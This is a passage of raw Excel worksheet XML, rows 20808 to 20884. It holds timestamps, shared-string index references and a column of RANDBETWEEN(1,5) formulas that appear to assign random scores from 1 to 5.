      <c r="E20808" s="2" t="s">
        <v>18735</v>
      </c>
      <c r="F20808">
        <f t="shared" ca="1" si="325"/>
        <v>1</v>
      </c>
    </row>
    <row r="20809" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20809" s="1">
        <v>43104.187349537038</v>
      </c>
      <c r="C20809" t="s">
        <v>48</v>
      </c>
      <c r="E20809" t="s">
        <v>18736</v>
      </c>
      <c r="F20809">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20810" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20810" s="1">
        <v>43104.124583333331</v>
      </c>
      <c r="C20810" t="s">
        <v>41</v>
      </c>
      <c r="E20810" t="s">
        <v>18737</v>
      </c>
      <c r="F20810">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20811" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A20811" s="1">
        <v>43104.119456018518</v>
      </c>
      <c r="C20811" t="s">
        <v>71</v>
      </c>
      <c r="D20811" t="s">
        <v>312</v>
      </c>
      <c r="E20811" s="2" t="s">
        <v>18738</v>
      </c>
      <c r="F20811">
        <f t="shared" ca="1" si="325"/>
        <v>1</v>
      </c>
    </row>
    <row r="20812" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A20812" s="1">
        <v>43104.067349537036</v>
      </c>
      <c r="C20812" t="s">
        <v>10</v>
      </c>
      <c r="D20812" t="s">
        <v>36</v>
      </c>
      <c r="E20812" s="2" t="s">
        <v>18739</v>
      </c>
      <c r="F20812">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20813" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A20813" s="1">
        <v>43104.001585648148</v>
      </c>
      <c r="C20813" t="s">
        <v>41</v>
      </c>
      <c r="E20813" s="2" t="s">
        <v>18740</v>
      </c>
      <c r="F20813">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20814" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20814" s="1">
        <v>43103.896215277775</v>
      </c>
      <c r="C20814" t="s">
        <v>6</v>
      </c>
      <c r="D20814" t="s">
        <v>25</v>
      </c>
      <c r="E20814" s="2" t="s">
        <v>18741</v>
      </c>
      <c r="F20814">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20815" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20815" s="1">
        <v>43103.818483796298</v>
      </c>
      <c r="C20815" t="s">
        <v>140</v>
      </c>
      <c r="D20815" t="s">
        <v>234</v>
      </c>
      <c r="E20815" s="2" t="s">
        <v>18742</v>
      </c>
      <c r="F20815">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20816" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20816" s="1">
        <v>43103.794687499998</v>
      </c>
      <c r="C20816" t="s">
        <v>10</v>
      </c>
      <c r="D20816" t="s">
        <v>6</v>
      </c>
      <c r="E20816" s="2" t="s">
        <v>18743</v>
      </c>
      <c r="F20816">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20817" s="1">
        <v>43103.75199074074</v>
      </c>
      <c r="C20817" t="s">
        <v>10</v>
      </c>
      <c r="D20817" t="s">
        <v>46</v>
      </c>
      <c r="E20817" t="s">
        <v>18744</v>
      </c>
      <c r="F20817">
        <f t="shared" ca="1" si="325"/>
        <v>1</v>
      </c>
    </row>
    <row r="20818" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20818" s="1">
        <v>43103.715601851851</v>
      </c>
      <c r="C20818" t="s">
        <v>4500</v>
      </c>
      <c r="E20818" s="2" t="s">
        <v>18745</v>
      </c>
      <c r="F20818">
        <f t="shared" ca="1" si="325"/>
        <v>1</v>
      </c>
    </row>
    <row r="20819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20819" s="1">
        <v>43103.694525462961</v>
      </c>
      <c r="C20819" t="s">
        <v>10</v>
      </c>
      <c r="D20819" t="s">
        <v>6</v>
      </c>
      <c r="E20819" t="s">
        <v>18746</v>
      </c>
      <c r="F20819">
        <f t="shared" ca="1" si="325"/>
        <v>4</v>
      </c>
    </row>
    <row r="20820" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20820" s="1">
        <v>43103.653414351851</v>
      </c>
      <c r="C20820" t="s">
        <v>10</v>
      </c>
      <c r="D20820" t="s">
        <v>89</v>
      </c>
      <c r="E20820" s="2" t="s">
        <v>18747</v>
      </c>
      <c r="F20820">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20821" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20821" s="1">
        <v>43103.653414351851</v>
      </c>
      <c r="C20821" t="s">
        <v>10</v>
      </c>
      <c r="D20821" t="s">
        <v>89</v>
      </c>
      <c r="E20821" s="2" t="s">
        <v>18747</v>
      </c>
      <c r="F20821">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20822" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20822" s="1">
        <v>43103.649467592593</v>
      </c>
      <c r="C20822" t="s">
        <v>6</v>
      </c>
      <c r="D20822" t="s">
        <v>312</v>
      </c>
      <c r="E20822" s="2" t="s">
        <v>18748</v>
      </c>
      <c r="F20822">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20823" s="1">
        <v>43103.62636574074</v>
      </c>
      <c r="C20823" t="s">
        <v>10</v>
      </c>
      <c r="D20823" t="s">
        <v>39</v>
      </c>
      <c r="E20823" t="s">
        <v>18749</v>
      </c>
      <c r="F20823">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20824" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20824" s="1">
        <v>43103.621342592596</v>
      </c>
      <c r="C20824" t="s">
        <v>10</v>
      </c>
      <c r="D20824" t="s">
        <v>86</v>
      </c>
      <c r="E20824" t="s">
        <v>18750</v>
      </c>
      <c r="F20824">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20825" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20825" s="1">
        <v>43103.618206018517</v>
      </c>
      <c r="C20825" t="s">
        <v>10</v>
      </c>
      <c r="D20825" t="s">
        <v>263</v>
      </c>
      <c r="E20825" s="2" t="s">
        <v>18751</v>
      </c>
      <c r="F20825">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20826" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20826" s="1">
        <v>43103.617488425924</v>
      </c>
      <c r="C20826" t="s">
        <v>6</v>
      </c>
      <c r="D20826" t="s">
        <v>25</v>
      </c>
      <c r="E20826" s="2" t="s">
        <v>18752</v>
      </c>
      <c r="F20826">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20827" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20827" s="1">
        <v>43103.612395833334</v>
      </c>
      <c r="C20827" t="s">
        <v>6</v>
      </c>
      <c r="D20827" t="s">
        <v>25</v>
      </c>
      <c r="E20827" t="s">
        <v>18753</v>
      </c>
      <c r="F20827">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20828" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A20828" s="1">
        <v>43103.602673611109</v>
      </c>
      <c r="C20828" t="s">
        <v>4970</v>
      </c>
      <c r="D20828" t="s">
        <v>6</v>
      </c>
      <c r="E20828" s="2" t="s">
        <v>18754</v>
      </c>
      <c r="F20828">
        <f t="shared" ca="1" si="325"/>
        <v>4</v>
      </c>
    </row>
    <row r="20829" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20829" s="1">
        <v>43103.597893518519</v>
      </c>
      <c r="C20829" t="s">
        <v>10</v>
      </c>
      <c r="D20829" t="s">
        <v>6</v>
      </c>
      <c r="E20829" s="2" t="s">
        <v>18755</v>
      </c>
      <c r="F20829">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20830" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20830" s="1">
        <v>43103.584004629629</v>
      </c>
      <c r="C20830" t="s">
        <v>10</v>
      </c>
      <c r="D20830" t="s">
        <v>192</v>
      </c>
      <c r="E20830" s="2" t="s">
        <v>18756</v>
      </c>
      <c r="F20830">
        <f t="shared" ca="1" si="325"/>
        <v>1</v>
      </c>
    </row>
    <row r="20831" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20831" s="1">
        <v>43103.563101851854</v>
      </c>
      <c r="C20831" t="s">
        <v>10</v>
      </c>
      <c r="D20831" t="s">
        <v>178</v>
      </c>
      <c r="E20831" s="2" t="s">
        <v>18757</v>
      </c>
      <c r="F20831">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20832" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20832" s="1">
        <v>43103.560185185182</v>
      </c>
      <c r="C20832" t="s">
        <v>10</v>
      </c>
      <c r="D20832" t="s">
        <v>20</v>
      </c>
      <c r="E20832" s="2" t="s">
        <v>18758</v>
      </c>
      <c r="F20832">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20833" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20833" s="1">
        <v>43103.556759259256</v>
      </c>
      <c r="C20833" t="s">
        <v>6</v>
      </c>
      <c r="D20833" t="s">
        <v>821</v>
      </c>
      <c r="E20833" s="2" t="s">
        <v>18759</v>
      </c>
      <c r="F20833">
        <f t="shared" ca="1" si="325"/>
        <v>4</v>
      </c>
    </row>
    <row r="20834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20834" s="1">
        <v>43103.552673611113</v>
      </c>
      <c r="C20834" t="s">
        <v>10</v>
      </c>
      <c r="D20834" t="s">
        <v>46</v>
      </c>
      <c r="E20834" t="s">
        <v>18760</v>
      </c>
      <c r="F20834">
        <f t="shared" ca="1" si="325"/>
        <v>4</v>
      </c>
    </row>
    <row r="20835" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20835" s="1">
        <v>43103.491736111115</v>
      </c>
      <c r="C20835" t="s">
        <v>10</v>
      </c>
      <c r="D20835" t="s">
        <v>86</v>
      </c>
      <c r="E20835" s="2" t="s">
        <v>18761</v>
      </c>
      <c r="F20835">
        <f t="shared" ca="1" si="325"/>
        <v>1</v>
      </c>
    </row>
    <row r="20836" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20836" s="1">
        <v>43103.473009259258</v>
      </c>
      <c r="C20836" t="s">
        <v>48</v>
      </c>
      <c r="E20836" s="2" t="s">
        <v>18762</v>
      </c>
      <c r="F20836">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20837" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20837" s="1">
        <v>43103.472685185188</v>
      </c>
      <c r="C20837" t="s">
        <v>6</v>
      </c>
      <c r="D20837" t="s">
        <v>114</v>
      </c>
      <c r="E20837" t="s">
        <v>18763</v>
      </c>
      <c r="F20837">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20838" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20838" s="1">
        <v>43103.462187500001</v>
      </c>
      <c r="C20838" t="s">
        <v>41</v>
      </c>
      <c r="E20838" s="2" t="s">
        <v>18764</v>
      </c>
      <c r="F20838">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20839" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20839" s="1">
        <v>43103.440636574072</v>
      </c>
      <c r="C20839" t="s">
        <v>10</v>
      </c>
      <c r="D20839" t="s">
        <v>6</v>
      </c>
      <c r="E20839" s="2" t="s">
        <v>18765</v>
      </c>
      <c r="F20839">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20840" s="1">
        <v>43103.437418981484</v>
      </c>
      <c r="C20840" t="s">
        <v>124</v>
      </c>
      <c r="E20840" t="s">
        <v>18766</v>
      </c>
      <c r="F20840">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20841" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20841" s="1">
        <v>43103.425439814811</v>
      </c>
      <c r="C20841" t="s">
        <v>6</v>
      </c>
      <c r="D20841" t="s">
        <v>25</v>
      </c>
      <c r="E20841" s="2" t="s">
        <v>18767</v>
      </c>
      <c r="F20841">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20842" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20842" s="1">
        <v>43103.405624999999</v>
      </c>
      <c r="C20842" t="s">
        <v>124</v>
      </c>
      <c r="E20842" t="s">
        <v>18768</v>
      </c>
      <c r="F20842">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20843" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20843" s="1">
        <v>43103.405439814815</v>
      </c>
      <c r="C20843" t="s">
        <v>163</v>
      </c>
      <c r="E20843" s="2" t="s">
        <v>18769</v>
      </c>
      <c r="F20843">
        <f t="shared" ca="1" si="325"/>
        <v>4</v>
      </c>
    </row>
    <row r="20844" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20844" s="1">
        <v>43103.359467592592</v>
      </c>
      <c r="C20844" t="s">
        <v>6</v>
      </c>
      <c r="D20844" t="s">
        <v>25</v>
      </c>
      <c r="E20844" s="2" t="s">
        <v>18770</v>
      </c>
      <c r="F20844">
        <f t="shared" ca="1" si="325"/>
        <v>4</v>
      </c>
    </row>
    <row r="20845" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20845" s="1">
        <v>43103.335844907408</v>
      </c>
      <c r="C20845" t="s">
        <v>10</v>
      </c>
      <c r="D20845" t="s">
        <v>112</v>
      </c>
      <c r="E20845" s="2" t="s">
        <v>18771</v>
      </c>
      <c r="F20845">
        <f t="shared" ca="1" si="325"/>
        <v>1</v>
      </c>
    </row>
    <row r="20846" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A20846" s="1">
        <v>43103.280231481483</v>
      </c>
      <c r="C20846" t="s">
        <v>48</v>
      </c>
      <c r="E20846" s="2" t="s">
        <v>18772</v>
      </c>
      <c r="F20846">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20847" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A20847" s="1">
        <v>43103.217546296299</v>
      </c>
      <c r="C20847" t="s">
        <v>65</v>
      </c>
      <c r="E20847" s="2" t="s">
        <v>18773</v>
      </c>
      <c r="F20847">
        <f t="shared" ca="1" si="325"/>
        <v>4</v>
      </c>
    </row>
    <row r="20848" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20848" s="1">
        <v>43103.211608796293</v>
      </c>
      <c r="C20848" t="s">
        <v>48</v>
      </c>
      <c r="D20848" t="s">
        <v>312</v>
      </c>
      <c r="E20848" s="2" t="s">
        <v>18774</v>
      </c>
      <c r="F20848">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20849" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20849" s="1">
        <v>43103.211481481485</v>
      </c>
      <c r="C20849" t="s">
        <v>10</v>
      </c>
      <c r="D20849" t="s">
        <v>178</v>
      </c>
      <c r="E20849" s="2" t="s">
        <v>18775</v>
      </c>
      <c r="F20849">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20850" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20850" s="1">
        <v>43103.200613425928</v>
      </c>
      <c r="C20850" t="s">
        <v>71</v>
      </c>
      <c r="E20850" s="2" t="s">
        <v>18776</v>
      </c>
      <c r="F20850">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20851" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20851" s="1">
        <v>43103.189699074072</v>
      </c>
      <c r="C20851" t="s">
        <v>65</v>
      </c>
      <c r="D20851" t="s">
        <v>312</v>
      </c>
      <c r="E20851" s="2" t="s">
        <v>18777</v>
      </c>
      <c r="F20851">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20852" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20852" s="1">
        <v>43103.184652777774</v>
      </c>
      <c r="C20852" t="s">
        <v>103</v>
      </c>
      <c r="E20852" s="2" t="s">
        <v>18778</v>
      </c>
      <c r="F20852">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20853" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A20853" s="1">
        <v>43103.139293981483</v>
      </c>
      <c r="C20853" t="s">
        <v>10</v>
      </c>
      <c r="D20853" t="s">
        <v>36</v>
      </c>
      <c r="E20853" s="2" t="s">
        <v>18779</v>
      </c>
      <c r="F20853">
        <f t="shared" ca="1" si="325"/>
        <v>4</v>
      </c>
    </row>
    <row r="20854" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A20854" s="1">
        <v>43103.124074074076</v>
      </c>
      <c r="C20854" t="s">
        <v>48</v>
      </c>
      <c r="D20854" t="s">
        <v>312</v>
      </c>
      <c r="E20854" s="2" t="s">
        <v>18780</v>
      </c>
      <c r="F20854">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20855" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20855" s="1">
        <v>43103.112974537034</v>
      </c>
      <c r="C20855" t="s">
        <v>71</v>
      </c>
      <c r="E20855" t="s">
        <v>18781</v>
      </c>
      <c r="F20855">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20856" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20856" s="1">
        <v>43103.089814814812</v>
      </c>
      <c r="C20856" t="s">
        <v>623</v>
      </c>
      <c r="D20856" t="s">
        <v>721</v>
      </c>
      <c r="E20856" t="s">
        <v>18782</v>
      </c>
      <c r="F20856">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20857" s="1">
        <v>43103.018148148149</v>
      </c>
      <c r="C20857" t="s">
        <v>41</v>
      </c>
      <c r="E20857" t="s">
        <v>18783</v>
      </c>
      <c r="F20857">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20858" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20858" s="1">
        <v>43103.018136574072</v>
      </c>
      <c r="C20858" t="s">
        <v>41</v>
      </c>
      <c r="E20858" t="s">
        <v>18783</v>
      </c>
      <c r="F20858">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20859" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20859" s="1">
        <v>43102.988333333335</v>
      </c>
      <c r="C20859" t="s">
        <v>48</v>
      </c>
      <c r="E20859" s="2" t="s">
        <v>18784</v>
      </c>
      <c r="F20859">
        <f t="shared" ca="1" si="325"/>
        <v>1</v>
      </c>
    </row>
    <row r="20860" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20860" s="1">
        <v>43102.988321759258</v>
      </c>
      <c r="C20860" t="s">
        <v>48</v>
      </c>
      <c r="E20860" s="2" t="s">
        <v>18784</v>
      </c>
      <c r="F20860">
        <f t="shared" ca="1" si="325"/>
        <v>4</v>
      </c>
    </row>
    <row r="20861" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20861" s="1">
        <v>43102.911608796298</v>
      </c>
      <c r="C20861" t="s">
        <v>10</v>
      </c>
      <c r="D20861" t="s">
        <v>23</v>
      </c>
      <c r="E20861" s="2" t="s">
        <v>18785</v>
      </c>
      <c r="F20861">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20862" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20862" s="1">
        <v>43102.839224537034</v>
      </c>
      <c r="C20862" t="s">
        <v>10</v>
      </c>
      <c r="D20862" t="s">
        <v>6</v>
      </c>
      <c r="E20862" t="s">
        <v>18786</v>
      </c>
      <c r="F20862">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20863" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20863" s="1">
        <v>43102.783506944441</v>
      </c>
      <c r="C20863" t="s">
        <v>1408</v>
      </c>
      <c r="E20863" s="2" t="s">
        <v>18787</v>
      </c>
      <c r="F20863">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20864" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20864" s="1">
        <v>43102.751400462963</v>
      </c>
      <c r="C20864" t="s">
        <v>10</v>
      </c>
      <c r="D20864" t="s">
        <v>20</v>
      </c>
      <c r="E20864" t="s">
        <v>18788</v>
      </c>
      <c r="F20864">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20865" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20865" s="1">
        <v>43102.744756944441</v>
      </c>
      <c r="C20865" t="s">
        <v>10</v>
      </c>
      <c r="D20865" t="s">
        <v>107</v>
      </c>
      <c r="E20865" s="2" t="s">
        <v>18789</v>
      </c>
      <c r="F20865">
        <f t="shared" ca="1" si="325"/>
        <v>3</v>
      </c>
    </row>
    <row r="20866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20866" s="1">
        <v>43102.741238425922</v>
      </c>
      <c r="C20866" t="s">
        <v>260</v>
      </c>
      <c r="D20866" t="s">
        <v>1036</v>
      </c>
      <c r="E20866" t="s">
        <v>18790</v>
      </c>
      <c r="F20866">
        <f t="shared" ref="F20866:F20929" ca="1" si="326">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="20867" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20867" s="1">
        <v>43102.696319444447</v>
      </c>
      <c r="C20867" t="s">
        <v>10</v>
      </c>
      <c r="D20867" t="s">
        <v>151</v>
      </c>
      <c r="E20867" t="s">
        <v>18791</v>
      </c>
      <c r="F20867">
        <f t="shared" ca="1" si="326"/>
        <v>4</v>
      </c>
    </row>
    <row r="20868" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20868" s="1">
        <v>43102.682523148149</v>
      </c>
      <c r="C20868" t="s">
        <v>10</v>
      </c>
      <c r="D20868" t="s">
        <v>52</v>
      </c>
      <c r="E20868" t="s">
        <v>18792</v>
      </c>
      <c r="F20868">
        <f t="shared" ca="1" si="326"/>
        <v>3</v>
      </c>
    </row>
    <row r="20869" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20869" s="1">
        <v>43102.674525462964</v>
      </c>
      <c r="C20869" t="s">
        <v>6</v>
      </c>
      <c r="D20869" t="s">
        <v>25</v>
      </c>
      <c r="E20869" t="s">
        <v>18793</v>
      </c>
      <c r="F20869">
        <f t="shared" ca="1" si="326"/>
        <v>2</v>
      </c>
    </row>
    <row r="20870" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20870" s="1">
        <v>43102.669618055559</v>
      </c>
      <c r="C20870" t="s">
        <v>10</v>
      </c>
      <c r="D20870" t="s">
        <v>163</v>
      </c>
      <c r="E20870" t="s">
        <v>18794</v>
      </c>
      <c r="F20870">
        <f t="shared" ca="1" si="326"/>
        <v>4</v>
      </c>
    </row>
    <row r="20871" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20871" s="1">
        <v>43102.658217592594</v>
      </c>
      <c r="C20871" t="s">
        <v>10</v>
      </c>
      <c r="D20871" t="s">
        <v>36</v>
      </c>
      <c r="E20871" t="s">
        <v>18795</v>
      </c>
      <c r="F20871">
        <f t="shared" ca="1" si="326"/>
        <v>3</v>
      </c>
    </row>
    <row r="20872" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20872" s="1">
        <v>43102.652233796296</v>
      </c>
      <c r="C20872" t="s">
        <v>5162</v>
      </c>
      <c r="D20872" t="s">
        <v>89</v>
      </c>
      <c r="E20872" t="s">
        <v>18796</v>
      </c>
      <c r="F20872">
        <f t="shared" ca="1" si="326"/>
        <v>3</v>
      </c>
    </row>
    <row r="20873" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20873" s="1">
        <v>43102.648946759262</v>
      </c>
      <c r="C20873" t="s">
        <v>10</v>
      </c>
      <c r="D20873" t="s">
        <v>271</v>
      </c>
      <c r="E20873" t="s">
        <v>18797</v>
      </c>
      <c r="F20873">
        <f t="shared" ca="1" si="326"/>
        <v>3</v>
      </c>
    </row>
    <row r="20874" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20874" s="1">
        <v>43102.63621527778</v>
      </c>
      <c r="C20874" t="s">
        <v>10</v>
      </c>
      <c r="D20874" t="s">
        <v>271</v>
      </c>
      <c r="E20874" t="s">
        <v>18798</v>
      </c>
      <c r="F20874">
        <f t="shared" ca="1" si="326"/>
        <v>5</v>
      </c>
    </row>
    <row r="20875" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20875" s="1">
        <v>43102.615520833337</v>
      </c>
      <c r="C20875" t="s">
        <v>10</v>
      </c>
      <c r="D20875" t="s">
        <v>107</v>
      </c>
      <c r="E20875" t="s">
        <v>18799</v>
      </c>
      <c r="F20875">
        <f t="shared" ca="1" si="326"/>
        <v>2</v>
      </c>
    </row>
    <row r="20876" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20876" s="1">
        <v>43102.611608796295</v>
      </c>
      <c r="C20876" t="s">
        <v>907</v>
      </c>
      <c r="D20876" t="s">
        <v>263</v>
      </c>
      <c r="E20876" s="2" t="s">
        <v>18800</v>
      </c>
      <c r="F20876">
        <f t="shared" ca="1" si="326"/>
        <v>3</v>
      </c>
    </row>
    <row r="20877" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20877" s="1">
        <v>43102.609490740739</v>
      </c>
      <c r="C20877" t="s">
        <v>10</v>
      </c>
      <c r="D20877" t="s">
        <v>232</v>
      </c>
      <c r="E20877" t="s">
        <v>18801</v>
      </c>
      <c r="F20877">
        <f t="shared" ca="1" si="326"/>
        <v>1</v>
      </c>
    </row>
    <row r="20878" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A20878" s="1">
        <v>43102.546666666669</v>
      </c>
      <c r="C20878" t="s">
        <v>10</v>
      </c>
      <c r="D20878" t="s">
        <v>33</v>
      </c>
      <c r="E20878" s="2" t="s">
        <v>18802</v>
      </c>
      <c r="F20878">
        <f t="shared" ca="1" si="326"/>
        <v>3</v>
      </c>
    </row>
    <row r="20879" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20879" s="1">
        <v>43102.539583333331</v>
      </c>
      <c r="C20879" t="s">
        <v>16</v>
      </c>
      <c r="E20879" s="2" t="s">
        <v>18803</v>
      </c>
      <c r="F20879">
        <f t="shared" ca="1" si="326"/>
        <v>5</v>
      </c>
    </row>
    <row r="20880" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20880" s="1">
        <v>43102.520567129628</v>
      </c>
      <c r="C20880" t="s">
        <v>222</v>
      </c>
      <c r="E20880" s="2" t="s">
        <v>18804</v>
      </c>
      <c r="F20880">
        <f t="shared" ca="1" si="326"/>
        <v>5</v>
      </c>
    </row>
    <row r="20881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20881" s="1">
        <v>43102.518611111111</v>
      </c>
      <c r="C20881" t="s">
        <v>10</v>
      </c>
      <c r="D20881" t="s">
        <v>80</v>
      </c>
      <c r="E20881" t="s">
        <v>18805</v>
      </c>
      <c r="F20881">
        <f t="shared" ca="1" si="326"/>
        <v>2</v>
      </c>
    </row>
    <row r="20882" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A20882" s="1">
        <v>43102.506053240744</v>
      </c>
      <c r="C20882" t="s">
        <v>10</v>
      </c>
      <c r="D20882" t="s">
        <v>20</v>
      </c>
      <c r="E20882" s="2" t="s">
        <v>18806</v>
      </c>
      <c r="F20882">
        <f t="shared" ca="1" si="326"/>
        <v>4</v>
      </c>
    </row>
    <row r="20883" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20883" s="1">
        <v>43102.487476851849</v>
      </c>
      <c r="C20883" t="s">
        <v>3443</v>
      </c>
      <c r="E20883" s="2" t="s">
        <v>18807</v>
      </c>
      <c r="F20883">
        <f t="shared" ca="1" si="326"/>
        <v>1</v>
      </c>
    </row>
    <row r="20884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20884" s="1">
        <v>43102.473819444444</v>
      </c>
      <c r="C20884" t="s">
        <v>97</v>
      </c>
      <c r="E20884" t="s">
        <v>18808</v>
      </c>
      <c r="F20884">
        <f t="shared" ca="1" si="326"/>
        <v>2</v>
